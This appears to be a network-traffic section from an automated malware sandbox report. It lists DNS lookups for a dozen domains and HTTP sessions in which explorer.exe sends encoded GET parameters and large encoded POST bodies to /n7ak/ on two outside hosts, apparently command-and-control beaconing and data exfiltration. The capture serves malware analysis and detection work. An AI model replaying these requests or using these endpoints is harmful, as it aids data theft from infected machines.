          Sep 22, 2024 17:25:51.256093979 CEST5948453192.168.2.71.1.1.1
          Sep 22, 2024 17:25:51.267574072 CEST53594841.1.1.1192.168.2.7
          Sep 22, 2024 17:26:10.880997896 CEST5176153192.168.2.71.1.1.1
          Sep 22, 2024 17:26:10.891551018 CEST53517611.1.1.1192.168.2.7
          Sep 22, 2024 17:26:30.740703106 CEST6486453192.168.2.71.1.1.1
          Sep 22, 2024 17:26:30.750695944 CEST53648641.1.1.1192.168.2.7
          Sep 22, 2024 17:26:51.334228039 CEST5157653192.168.2.71.1.1.1
          Sep 22, 2024 17:26:51.366571903 CEST53515761.1.1.1192.168.2.7
          Sep 22, 2024 17:27:12.162921906 CEST5988453192.168.2.71.1.1.1
          Sep 22, 2024 17:27:12.209043980 CEST53598841.1.1.1192.168.2.7
          Sep 22, 2024 17:27:33.038193941 CEST5208553192.168.2.71.1.1.1
          Sep 22, 2024 17:27:33.048172951 CEST53520851.1.1.1192.168.2.7
          Sep 22, 2024 17:27:53.544715881 CEST5994453192.168.2.71.1.1.1
          Sep 22, 2024 17:27:53.580600977 CEST53599441.1.1.1192.168.2.7
          Sep 22, 2024 17:28:14.272828102 CEST6246253192.168.2.71.1.1.1
          Sep 22, 2024 17:28:14.307732105 CEST53624621.1.1.1192.168.2.7
          Sep 22, 2024 17:28:34.992857933 CEST6043453192.168.2.71.1.1.1
          Sep 22, 2024 17:28:35.019097090 CEST53604341.1.1.1192.168.2.7
          Sep 22, 2024 17:28:55.912898064 CEST5542153192.168.2.71.1.1.1
          Sep 22, 2024 17:28:55.925461054 CEST53554211.1.1.1192.168.2.7
          Sep 22, 2024 17:29:18.412283897 CEST5661853192.168.2.71.1.1.1
          Sep 22, 2024 17:29:18.429428101 CEST53566181.1.1.1192.168.2.7
          Sep 22, 2024 17:29:38.584283113 CEST4936753192.168.2.71.1.1.1
          Sep 22, 2024 17:29:39.031106949 CEST53493671.1.1.1192.168.2.7
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Sep 22, 2024 17:25:51.256093979 CEST192.168.2.71.1.1.10xbc97Standard query (0)www.supremeajock.bizA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:10.880997896 CEST192.168.2.71.1.1.10x1a23Standard query (0)www.1690.bizA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:30.740703106 CEST192.168.2.71.1.1.10x84d2Standard query (0)www.ancientshadowguilt.spaceA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:51.334228039 CEST192.168.2.71.1.1.10xede9Standard query (0)www.maximsboutique.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:12.162921906 CEST192.168.2.71.1.1.10x835bStandard query (0)www.tuktukwines.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:33.038193941 CEST192.168.2.71.1.1.10x242bStandard query (0)www.playdoapp.onlineA (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:53.544715881 CEST192.168.2.71.1.1.10xa4e0Standard query (0)www.taxuw.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:14.272828102 CEST192.168.2.71.1.1.10xf5e9Standard query (0)www.jam-nins.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:34.992857933 CEST192.168.2.71.1.1.10x547eStandard query (0)www.sdnaqianchuan.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:55.912898064 CEST192.168.2.71.1.1.10xb80aStandard query (0)www.parkpeninsula.onlineA (IP address)IN (0x0001)false
          Sep 22, 2024 17:29:18.412283897 CEST192.168.2.71.1.1.10x4eccStandard query (0)www.395boulderbrookdr.comA (IP address)IN (0x0001)false
          Sep 22, 2024 17:29:38.584283113 CEST192.168.2.71.1.1.10xf222Standard query (0)www.volkovastyu.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Sep 22, 2024 17:25:51.267574072 CEST1.1.1.1192.168.2.70xbc97Name error (3)www.supremeajock.biznonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:10.891551018 CEST1.1.1.1192.168.2.70x1a23Name error (3)www.1690.biznonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:30.750695944 CEST1.1.1.1192.168.2.70x84d2Name error (3)www.ancientshadowguilt.spacenonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:26:51.366571903 CEST1.1.1.1192.168.2.70xede9Name error (3)www.maximsboutique.comnonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:12.209043980 CEST1.1.1.1192.168.2.70x835bNo error (0)www.tuktukwines.comshops.myshopify.comCNAME (Canonical name)IN (0x0001)false
          Sep 22, 2024 17:27:12.209043980 CEST1.1.1.1192.168.2.70x835bNo error (0)shops.myshopify.com23.227.38.74A (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:33.048172951 CEST1.1.1.1192.168.2.70x242bName error (3)www.playdoapp.onlinenonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:27:53.580600977 CEST1.1.1.1192.168.2.70xa4e0Name error (3)www.taxuw.comnonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:14.307732105 CEST1.1.1.1192.168.2.70xf5e9No error (0)www.jam-nins.com203.161.60.191A (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:35.019097090 CEST1.1.1.1192.168.2.70x547eName error (3)www.sdnaqianchuan.comnonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:28:55.925461054 CEST1.1.1.1192.168.2.70xb80aName error (3)www.parkpeninsula.onlinenonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:29:18.429428101 CEST1.1.1.1192.168.2.70x4eccName error (3)www.395boulderbrookdr.comnonenoneA (IP address)IN (0x0001)false
          Sep 22, 2024 17:29:39.031106949 CEST1.1.1.1192.168.2.70xf222No error (0)www.volkovastyu.comvolkovastyu.comCNAME (Canonical name)IN (0x0001)false
          Sep 22, 2024 17:29:39.031106949 CEST1.1.1.1192.168.2.70xf222No error (0)volkovastyu.com78.46.88.140A (IP address)IN (0x0001)false
          • www.tuktukwines.com
          • www.jam-nins.com
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.74971323.227.38.74804056C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Sep 22, 2024 17:27:12.236576080 CEST180OUTGET /n7ak/?OrT4vp=D48xOFEPf6J&nrCxNDk=X95XYDcr/0ovQl8dFDDB2DmtDdbecE+v1errdqyRv2syAHM7RuOPKheDNorHxKs8v8dmbSYlDw== HTTP/1.1
          Host: www.tuktukwines.com
          Connection: close
          Data Raw: 00 00 00 00 00 00 00
          Data Ascii:
          Sep 22, 2024 17:27:13.393188000 CEST1236INHTTP/1.1 403 Forbidden
          Date: Sun, 22 Sep 2024 15:27:12 GMT
          Content-Type: text/html; charset=UTF-8
          Content-Length: 4514
          Connection: close
          X-Frame-Options: SAMEORIGIN
          Referrer-Policy: same-origin
          Cache-Control: max-age=15
          Expires: Sun, 22 Sep 2024 15:27:27 GMT
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
          Server-Timing: cfRequestDuration;dur=15.000105
          X-XSS-Protection: 1; mode=block
          X-Content-Type-Options: nosniff
          X-Permitted-Cross-Domain-Policies: none
          X-Download-Options: noopen
          Server: cloudflare
          CF-RAY: 8c7351583c871895-EWR
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta ht
          Sep 22, 2024 17:27:13.393207073 CEST1236INData Raw: 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d
          Data Ascii: tp-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=Edge" /><meta name="robots" content="noindex, nofollow" /><meta name="viewport" content="width=device-width,initial-scale=1" /><lin
          Sep 22, 2024 17:27:13.393219948 CEST448INData Raw: 6d 79 73 68 6f 70 69 66 79 2e 63 6f 6d 3c 2f 68 32 3e 0a 20 20 20 20 20 20 3c 2f 64 69 76 3e 3c 21 2d 2d 20 2f 2e 68 65 61 64 65 72 20 2d 2d 3e 0a 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 73 65 63 74 69 6f 6e 20 63 66 2d
          Data Ascii: myshopify.com</h2> </div>... /.header --> <div class="cf-section cf-highlight"> <div class="cf-wrapper"> <div class="cf-screenshot-container cf-screenshot-full"> <span class="cf-no-scr
          Sep 22, 2024 17:27:13.397914886 CEST1236INData Raw: 6c 61 73 73 3d 22 63 66 2d 63 6f 6c 75 6d 6e 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 68 32 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 62 6c 6f 63 6b 65 64 5f 77 68 79 5f 68 65 61 64 6c 69 6e 65 22 3e 57 68 79 20 68 61 76 65 20 49
          Data Ascii: lass="cf-column"> <h2 data-translate="blocked_why_headline">Why have I been blocked?</h2> <p data-translate="blocked_why_detail">This website is using a security service to protect itself from online attacks. The actio
          Sep 22, 2024 17:27:13.397929907 CEST1191INData Raw: 65 70 61 72 61 74 6f 72 20 73 6d 3a 68 69 64 64 65 6e 22 3e 26 62 75 6c 6c 3b 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 20 69 64 3d 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 20 63 6c 61 73 73 3d 22 63 66 2d 66 6f 6f 74 65
          Data Ascii: eparator sm:hidden">&bull;</span> <span id="cf-footer-item-ip" class="cf-footer-item hidden sm:block sm:mb-1"> Your IP: <button type="button" id="cf-footer-ip-reveal" class="cf-footer-ip-reveal-btn">Click to reveal</button>
          Sep 22, 2024 17:27:13.397960901 CEST1236INHTTP/1.1 403 Forbidden
          Date: Sun, 22 Sep 2024 15:27:12 GMT
          Content-Type: text/html; charset=UTF-8
          Content-Length: 4514
          Connection: close
          X-Frame-Options: SAMEORIGIN
          Referrer-Policy: same-origin
          Cache-Control: max-age=15
          Expires: Sun, 22 Sep 2024 15:27:27 GMT
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I0FTsUAvKwEiZ3xh83g5%2Bv7bxN7oDtcOzSHFadiDKrLUdGKPZQGQ1Ifpo7oz9NVXw6uVe522O4MgjOch%2B9OFYWkh3OF1hnImFLmJLtOul4hBc8ERIJKi5BDDYp91oN3n7as01VA%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
          Server-Timing: cfRequestDuration;dur=15.000105
          X-XSS-Protection: 1; mode=block
          X-Content-Type-Options: nosniff
          X-Permitted-Cross-Domain-Policies: none
          X-Download-Options: noopen
          Server: cloudflare
          CF-RAY: 8c7351583c871895-EWR
          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e [TRUNCATED]
          Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if gt IE 8]>...> <html class="no-js" lang="en-US"> ...<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta ht


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          1192.168.2.74971423.227.38.74804056C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Sep 22, 2024 17:27:13.399496078 CEST12360OUTPOST /n7ak/ HTTP/1.1
          Host: www.tuktukwines.com
          Connection: close
          Content-Length: 133153
          Cache-Control: no-cache
          Origin: http://www.tuktukwines.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.tuktukwines.com/n7ak/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
          Data Raw: 6e 72 43 78 4e 44 6b 3d 66 66 31 74 47 6c 55 67 7e 69 6c 34 62 48 4d 70 66 7a 53 41 6e 31 4b 57 58 4e 7a 38 54 30 76 76 73 36 36 4c 59 49 32 76 68 7a 59 57 48 6a 59 78 44 4d 6a 64 4d 33 66 59 59 6f 28 59 7e 65 67 66 75 36 78 39 5a 42 6f 45 48 4b 55 69 62 44 28 63 57 41 63 4f 52 67 4e 67 32 4d 38 33 39 39 4b 50 44 33 7e 4f 62 48 6b 42 70 75 49 56 79 30 4a 4f 4c 61 72 4d 7e 78 48 44 71 37 61 38 45 32 6f 33 44 4a 46 78 48 79 30 76 63 4f 52 72 7a 72 6d 63 37 50 45 66 70 53 65 2d 61 48 63 4e 44 72 6a 39 70 38 45 41 4c 33 73 50 32 69 4a 4e 67 4f 61 59 36 4e 7e 33 36 6b 64 75 52 55 43 39 42 66 61 43 72 62 38 67 36 72 56 73 42 69 62 71 37 61 6d 4d 70 4c 7e 64 6b 37 37 77 45 54 68 44 33 6a 62 58 35 43 46 4c 6d 6a 62 79 36 6a 4b 63 6b 6b 31 32 71 70 34 4a 69 51 59 6e 4e 6d 30 69 59 43 43 52 36 43 69 67 62 4c 42 30 47 55 36 66 73 76 74 61 5a 58 7a 41 79 59 5a 31 63 54 4d 64 34 66 50 49 30 41 48 51 33 44 4f 54 70 77 48 47 74 31 55 56 32 73 7a 31 48 78 57 6c 42 4f 75 46 43 6e 4d 70 39 75 36 55 48 72 41 77 7a 4b [TRUNCATED]
          Data Ascii: nrCxNDk=ff1tGlUg~il4bHMpfzSAn1KWXNz8T0vvs66LYI2vhzYWHjYxDMjdM3fYYo(Y~egfu6x9ZBoEHKUibD(cWAcORgNg2M8399KPD3~ObHkBpuIVy0JOLarM~xHDq7a8E2o3DJFxHy0vcORrzrmc7PEfpSe-aHcNDrj9p8EAL3sP2iJNgOaY6N~36kduRUC9BfaCrb8g6rVsBibq7amMpL~dk77wEThD3jbX5CFLmjby6jKckk12qp4JiQYnNm0iYCCR6CigbLB0GU6fsvtaZXzAyYZ1cTMd4fPI0AHQ3DOTpwHGt1UV2sz1HxWlBOuFCnMp9u6UHrAwzK9GDI7NClJCLfIyNhQYUjmYkWdo(mcyEaaxTZXdj6i7vXFpicHtr1tVAVBtqsl2AMPKtmfug2wZ0lvLdpjFwt2L0wdtFXXR3ShegNkL71oLv8y5dQd-2F33NgK-hr3vf820U9IroJZxeLK-7EFntbDs~Npoh-49kzrQDi1rghPfTRE5IHeABsvmTWBjovzQWttN9HpSYcJnL3BE38~CSqG4DoOHiUQXbe4M5jwVEElCk3UGUT0_(mfg8oPIQcljQ9zdgz6qfp1Gcizmve6r(DOgY5jzU6xBXRknOD8bXnmWkn0OISdMsC78KTq5AqzmDVnyxsrCjTatJFh7NOWcyBS4r2rNtlTVWIXtbwWM3NnZfYjN8PIdQA1qkv66VS4J(qDAvbTsRbBvFqjS0dQeZdSRNU9DCQN4giu2X86Fa53zfJbRAaLoe8aipBIxJYv98pVOL8qbWrSw6i0uqj909vM66kV-Y0HaOYWTd-tot9saExuTT51GtOvYbVarcNa3v-(0wy0jT60_RXnjSROBL8KVA-TQAN00trzuBjNY7qYiaLs05X4760XutVUQ2XKdmZBjxtHvEMrD2JEkvPrFhQJSs6X63OeBZuBuxWj_FJnOn6FS(S1SkP2uPWK6FEEJQSN8ZE04nZjhL6W9PAsBJ_aN6P0Y61FAOsCP [TRUNCATED]
          Sep 22, 2024 17:27:13.405793905 CEST2472OUTData Raw: 4a 73 48 64 38 79 39 38 52 59 69 79 58 6a 7a 6e 6b 32 48 6a 63 59 78 71 78 44 71 4c 35 62 74 48 35 45 74 7a 30 37 68 5f 4d 56 38 6c 31 57 51 69 53 68 6f 71 4e 6e 43 37 53 36 4a 53 33 51 75 45 79 61 37 70 75 41 45 77 77 63 33 47 70 30 54 6b 6c 67
          Data Ascii: JsHd8y98RYiyXjznk2HjcYxqxDqL5btH5Etz07h_MV8l1WQiShoqNnC7S6JS3QuEya7puAEwwc3Gp0TklgO-KRVwAXyykUNWt4SUBpyEPCVB9BK79RWn8MVVggK7j5aJ5e5eLB2l0nHtF0pWmRg-LWQIK2(ZEghPohaT4EIJgQKP43JXFq8zFbKgZ6LWrEnc3Jtczkbrhxt_pUCZBh~nzImTyo5YOgFCvkVC69UUOKE8PoYDRMC
          Sep 22, 2024 17:27:13.407118082 CEST4944OUTData Raw: 33 71 32 5a 70 57 67 73 39 34 71 50 44 50 37 34 28 73 70 30 42 58 67 65 6b 4b 47 76 4e 74 36 73 6c 48 44 4e 53 6e 67 33 6e 35 4c 52 43 5f 55 41 34 62 63 52 39 46 59 79 59 64 71 47 53 47 4f 4c 78 79 6b 76 7e 5a 66 57 74 56 48 75 63 6d 62 6e 51 48
          Data Ascii: 3q2ZpWgs94qPDP74(sp0BXgekKGvNt6slHDNSng3n5LRC_UA4bcR9FYyYdqGSGOLxykv~ZfWtVHucmbnQHGlQjWt4apSb5NiuXyvXKWmndmkQQ5UvxFj1lu-KtL_7JgAdjHOSPE8OJHKBtJ3Zo7qwo(zLJdTbgE03Bisb3l6cUsrW7wJ5P0id7lqYFkfkSnFJyTZ3fGqn5oMeeZzT-HNp2edlYJ9esMQhuMtS8bxtAq2Gwot(-x
          Sep 22, 2024 17:27:13.407138109 CEST4944OUTData Raw: 78 6a 6f 50 79 39 33 4c 77 74 75 6f 4e 2d 6a 59 48 42 7e 71 66 69 45 76 55 78 30 62 4b 5f 76 55 69 66 6f 69 4f 61 33 54 75 78 78 59 32 7a 72 7a 42 35 6d 59 76 4b 76 63 57 66 4a 77 79 69 38 4a 53 62 47 37 36 57 37 4e 49 6b 73 59 38 48 6b 6b 46 38
          Data Ascii: xjoPy93LwtuoN-jYHB~qfiEvUx0bK_vUifoiOa3TuxxY2zrzB5mYvKvcWfJwyi8JSbG76W7NIksY8HkkF8qWELHAjTdWNz6uCFsumk6l2_qlkS5s2FnX1KvPCxB2ztiNANE-iuOhArpxHNT13Q(W39a42VAGM0zhUNfDEzIreL6WMkpaWwNqQmBo9r9eGIgJ~1QV1DvgKypBV1H3FOnR6bTkIXDDMQb1cSxdY_1apkCwayo2Yj8
          Sep 22, 2024 17:27:13.409547091 CEST4944OUTData Raw: 52 69 75 6e 39 33 6f 50 35 70 67 67 4e 6d 42 35 44 7a 75 39 66 6a 78 62 4b 4a 71 34 4d 71 28 76 56 72 7a 5a 70 4f 72 6c 41 6b 79 75 4b 43 78 34 71 34 56 34 5a 72 72 67 73 50 38 55 43 31 78 52 36 59 67 68 6f 44 32 46 69 31 35 48 7e 4e 69 4c 7a 4e
          Data Ascii: Riun93oP5pggNmB5Dzu9fjxbKJq4Mq(vVrzZpOrlAkyuKCx4q4V4ZrrgsP8UC1xR6YghoD2Fi15H~NiLzNapu2wpr_haMQHRWCjESLkOV7t4IOGGJvRZTpg3pMbztCT2u5oghTDCmIax6919gb(ipBNYfEcRCa(2lgPrA98qG0UJCsJD(cYrxnA_Q05fidkTqVxbjgnDyDvzC7SxDaCR4z0-3fG5el3uG2Uv6xWIYOnIthbsAWc
          Sep 22, 2024 17:27:13.409567118 CEST2472OUTData Raw: 55 59 74 5a 45 66 72 75 34 48 49 77 77 4d 45 70 6f 4f 62 6a 7a 32 67 4f 7e 71 4c 57 52 44 73 74 4c 69 5a 45 72 53 51 4f 4f 31 70 6f 4a 36 6a 51 78 4d 7a 6c 50 6c 76 6e 36 43 4a 47 56 6d 7a 6a 4a 4d 56 2d 4b 35 30 7a 35 62 5a 67 6d 58 49 58 43 50
          Data Ascii: UYtZEfru4HIwwMEpoObjz2gO~qLWRDstLiZErSQOO1poJ6jQxMzlPlvn6CJGVmzjJMV-K50z5bZgmXIXCPrEBwwpt4PR6Y(XjiPAwQsY8StVPH(a7iW8gHgEVCJORgpGTa9P~BCtfIRhndXC9mL8ybz0W0CfnJyaHMVbP3ucraXv1bITH6hTK87Uleo-qAGLzY1BmL(n(_lFmicrRMWrnr8PgZKcWZtYySmDFWeQNPvH32(1pO2
          Sep 22, 2024 17:27:13.409589052 CEST2472OUTData Raw: 66 77 64 58 6b 52 53 50 59 75 5a 4a 62 55 65 6a 7a 51 7a 33 48 30 67 7a 53 57 5a 51 57 30 49 45 62 4b 48 6d 34 30 63 64 70 4f 7e 35 57 54 7a 38 78 45 70 42 36 78 5a 7a 46 71 63 69 61 4b 39 45 58 32 37 53 45 65 4e 76 28 52 73 4b 7a 58 5a 56 53 78
          Data Ascii: fwdXkRSPYuZJbUejzQz3H0gzSWZQW0IEbKHm40cdpO~5WTz8xEpB6xZzFqciaK9EX27SEeNv(RsKzXZVSxqtW2zBI3nfL962U8p45NR-x07Sm7cVGUsLs30-cwmmg4iC1Y4dskYJJvAalBNvUCETduPPdJ1B2vGok2T2A5o31ZUHYD0K8xOCa7sWnMgKEUkfHbIN2F5U4Qq5cd38NxOOhMB25JjcAO97MT8Gsh4ivaQruXHqk7g
          Sep 22, 2024 17:27:13.409862041 CEST2472OUTData Raw: 7a 57 41 4f 46 57 54 6b 69 67 37 70 72 4e 47 54 54 4b 61 38 30 71 73 4d 51 36 28 31 71 48 4a 7a 33 56 75 35 62 30 35 72 78 57 45 53 6b 58 43 64 54 53 45 78 33 4a 62 66 49 36 6b 4e 53 71 64 4e 75 36 31 34 5a 4b 4f 62 74 65 61 54 66 36 4c 36 72 51
          Data Ascii: zWAOFWTkig7prNGTTKa80qsMQ6(1qHJz3Vu5b05rxWESkXCdTSEx3JbfI6kNSqdNu614ZKObteaTf6L6rQhUgDwVWjvzwVNCh1V6FhZox9TPSaL5r-gbubAzk_nk4F36qpRxKJg3DWfUdd~NM0Tz8eYXdvYhaZbTtbQugFZMIR5WkL7gx8HZWroOycHZBYMzDi0FlgVMacnBYKqWbyt_De0lYUX5J9qyVIdqdzhD1QX0eqAVgZe
          Sep 22, 2024 17:27:13.411086082 CEST4944OUTData Raw: 50 42 52 62 50 38 28 55 42 63 35 70 74 5f 4a 42 75 47 36 72 43 37 30 6e 76 38 4c 79 38 39 55 4d 7a 79 61 68 47 38 38 77 58 72 50 32 49 46 63 32 54 36 55 65 38 4f 34 54 41 54 4e 58 47 65 4e 39 6b 6d 44 4e 47 78 68 6d 57 4c 71 30 64 53 30 62 78 2d
          Data Ascii: PBRbP8(UBc5pt_JBuG6rC70nv8Ly89UMzyahG88wXrP2IFc2T6Ue8O4TATNXGeN9kmDNGxhmWLq0dS0bx-GT9sl7FB7mRQpYGKBpW_WiDMJ0Jxgi42fidAxl~XPloueAelx2yj4JFHi9a09YXk9hQGMCZd(2c6peqEsY739pkDqll0f-Vm75alUBdVJ0gYgxRwHmcteOMlhJ0C0EJ5s89LukNWwn6EuoEAXaEH9S9JPegKZSmkQ
          Sep 22, 2024 17:27:13.412142038 CEST4944OUTData Raw: 41 4b 61 72 39 74 32 37 42 44 37 56 43 73 39 36 46 34 36 37 61 45 36 6b 5a 45 31 71 70 57 54 4f 36 44 6d 5f 73 73 35 5f 76 63 62 52 44 79 4a 36 54 6f 41 4c 6c 58 50 34 49 71 4a 51 33 35 61 68 56 38 4b 49 65 37 4d 6c 53 33 61 4e 36 42 34 5a 59 65
          Data Ascii: AKar9t27BD7VCs96F467aE6kZE1qpWTO6Dm_ss5_vcbRDyJ6ToALlXP4IqJQ35ahV8KIe7MlS3aN6B4ZYePVknMuCLK636LonDH4CvpEVP58JHO5DY3nW-5WSwiA0dDi3v10K_MoDPyyp-lsiQX_YZpwX3ZsBYjnA25DfKm5XAEYim(Q6-8ebjSrujiPedqcKCFZsB8xqGEPUZDhZTtJQiQc9-zs2uwHhdyhqw3_8Vt0K7twTRB
          Sep 22, 2024 17:27:13.412163019 CEST4944OUTData Raw: 61 76 62 52 65 32 4a 4d 43 38 38 56 49 62 32 77 6b 42 6e 58 4e 4b 55 74 52 49 49 56 4d 45 67 52 56 61 64 44 71 6b 34 52 41 50 56 6d 4b 6b 44 4d 72 69 66 56 39 53 37 69 33 4b 52 76 62 68 36 42 76 34 72 42 74 4a 5a 4f 45 75 70 72 55 6e 6f 66 71 5a
          Data Ascii: avbRe2JMC88VIb2wkBnXNKUtRIIVMEgRVadDqk4RAPVmKkDMrifV9S7i3KRvbh6Bv4rBtJZOEuprUnofqZV3LSmBfFBGmvx7oAb0uR11jdoqvYTrP96jtMT-NXtVdJnNmqQnne2BhR7XIMAjThAZQxaSc2YCRkUYuho6EWDSE-MieP5pOXqIac8GzmSeXYgG3VTiCAqctHAcqzmeoC6kPEFYhLLd6OWYwFykNFkCDyoSjAHYSan


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          2192.168.2.749715203.161.60.191804056C:\Windows\explorer.exe
          TimestampBytes transferredDirectionData
          Sep 22, 2024 17:28:14.318166018 CEST12360OUTPOST /n7ak/ HTTP/1.1
          Host: www.jam-nins.com
          Connection: close
          Content-Length: 133153
          Cache-Control: no-cache
          Origin: http://www.jam-nins.com
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Content-Type: application/x-www-form-urlencoded
          Accept: */*
          Referer: http://www.jam-nins.com/n7ak/
          Accept-Language: en-US
          Accept-Encoding: gzip, deflate
